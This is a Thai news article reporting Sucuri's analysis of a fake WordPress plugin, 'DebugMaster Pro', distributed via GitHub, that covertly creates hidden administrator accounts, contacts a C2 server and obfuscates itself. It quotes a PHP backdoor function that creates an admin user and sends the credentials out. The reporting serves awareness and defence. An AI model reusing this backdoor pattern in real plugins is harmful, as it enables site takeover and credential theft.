ของมันคู่กัน นักวิจัยพบมัลแวร์ล่องหนตัวใหม่ สามารถในการสร้างบัญชี Admin บนเว็บ WordPress ได้

WordPress อาจจะเป็นหนึ่งในแพลตฟอร์มยอดนิยมสำหรับการสร้างเว็บไซต์ แต่ก็เป็นเป้าหมายอันดับหนึ่งในการแฮก หรือ ปล่อยมัลแวร์เพื่อเข้ายึดเว็บไซต์เช่นเดียวกัน ซึ่งในส่วนตรงนี้ผู้ใช้งานอาจต้องยอมรับความเสี่ยง และหาทางป้องกันอย่างสุดความสามารถ ซึ่งข่าวนี้อาจเป็นอีกกรณีหนึ่งที่ผู้ใช้งาน WordPress สำหรับการสร้างเว็บไซต์ควรให้ความใส่ใจ

จากรายงานโดยเว็บไซต์ (RS)Websol ได้กล่าวถึงการตรวจพบมัลแวร์ล่องหน (Stealthy Malware) ที่มุ่งเน้นไปยังการโจมตีเว็บไซต์ซึ่งถูกสร้างขึ้นบนแพลตฟอร์ม WordPress ซึ่งมัลแวร์ที่ไม่ถูกระบุชื่อดังกล่าวนั้น ทางทีมวิจัยจาก Sucuri บริษัทผู้เชี่ยวชาญด้านการจัดการระบบรักษาความปลอดภัยบนเว็บไซต์ซึ่งเป็นทีมผู้ตรวจพบมัลแวร์ดังกล่าว ได้กล่าวว่า มัลแวร์ดังกล่าวนั้นนอกจากความสามารถพื้นฐานในการเป็นประตูหลังของระบบ (Backdoor) ให้แฮกเกอร์เข้าควบคุมเว็บไซต์ได้แล้ว ยังมีความสามารถอื่น ๆ อีกมากมาย เช่น ความสามารถในการพรางตัวในที่แจ้ง (Steganography) ซึ่งทำให้การตรวจพบเป็นไปได้อย่างยากลำบาก เสมือนกับล่องหนได้

ตัวมัลแวร์นั้นจะปลอมตัวเป็นปลั๊กอิน (Plug-In) ที่มีชื่อว่า “DebugMaster Pro” โดยตัวปลั๊กอินปลอมนี้จะมีให้ดาวน์โหลดบนแพลตฟอร์มที่มีความน่าเชื่อถือสูงอย่างคลังเก็บไฟล์ดิจิทัล (Repo หรือ Repository) ของทาง Github ซึ่งเป็นเว็บไซต์ยอดนิยมของเหล่านักพัฒนาซอฟต์แวร์ (Developer) โดยตัวไฟล์ปลั๊กอินนั้นจะมีการใส่รายละเอียดสำหรับข้อมูลภายใน (Metadata) จนดูมีความน่าเชื่อถือ อย่างเช่น ข้อมูลเชิงลึกต่าง ๆ ที่ตัวซอฟต์แวร์แท้ควรมี อย่างหมายเลขเวอร์ชัน และชื่อผู้พัฒนา

แต่จากฉากภายนอกที่ดูเหมือนว่าจะเป็นปลั๊กอินที่ไม่เป็นอันตรายนั้น ภายในกลับมีการแฝงสคริปท์สำหรับการสร้างบัญชีระดับผู้ดูแล (Administrator) บนเว็บไซต์ หลังจากที่เหยื่อทำการติดตั้งปลั๊กอินปลอมดังกล่าวลงไป โดยหลังจากสร้างเสร็จ ตัวโค้ดเดียวกันนี้ยังจะทำการเชื่อมต่อตัวเว็บไซต์ กับเซิร์ฟเวอร์ควบคุมมัลแวร์ (C2 หรือ Command and Control) อีกด้วย โดยตัวโค้ดนั้นมีลักษณะดังนี้

public function create_admin_user() {

if (get_option($this->init_flag, false)) return;

$creds = $this->generate_credentials();

if (!username_exists($creds["user"])) {

$user_id = wp_create_user($creds["user"], $creds["pass"], $creds["email"]);

if (!is_wp_error($user_id)) {

$user = new WP_User($user_id);

$user->set_role("administrator");

}

}

$this->send_credentials($creds);

update_option($this->init_flag, time() + 86400 * 30);

}

นอกจากความสามารถดังกล่าวที่ได้กล่าวมาข้างต้นแล้ว ทางทีมวิจัยยังกล่าวว่า ลักษณะการเขียนของตัวโค้ดที่มีการใช้การเขียนในรูปแบบ Hex และใช้ Goto Statement จำนวนมากนั้น เป็นการเขียนโดยมีวัตถุประสงค์เพื่อการตีรวนระบบการตรวจจับแบบค่าคงที่ (Static Analysis) ให้เกิดความสับสน (Obfuscation)

นอกจากนั้นยังมีความสามารถในการซ่อนตัวอย่างแนบเนียน ด้วยการใช้ตัวกรอง Querry เพื่อซ่อนตัวปลั๊กอินไม่ให้ปรากฏบนรายชื่อปลั๊กอิน และซ่อนบัญชีผู้ดูแลที่มัลแวร์สร้างขึ้นมาไม่ให้ผู้ดูแลที่เหลือสามารถมองเห็นได้ ไม่เพียงเท่านั้น ตัวมัลแวร์ยังมีความสามารถในการตรวจสอบหมายเลขไอพี (IP) และพฤติกรรมการใช้งานบัญชีผู้ดูแล แล้วทำการเพิ่มรายชื่อของหมายเลขไอพีที่น่าเชื่อถือ (Whitelist) ของแฮกเกอร์ที่ใช้งานบัญชีดังกล่าวลงไปในรายชื่อ เพื่อไม่ให้ผู้ดูแลเว็บไซต์ตัวจริงเกิดความเอะใจอีกด้วย เรียกได้ว่าตัวมัลแวร์ดังกล่าวมีความสามารถในการหลบซ่อนที่ร้ายกาจมาก

ทั้งนี้ ทั้งทางแหล่งข่าว และทางทีมวิจัยนั้น ไม่ได้ให้ข้อมูลถึงวิธีการกำจัด หรือจัดการกับมัลแวร์ดังกล่าวมาในครั้งนี้แต่อย่างใด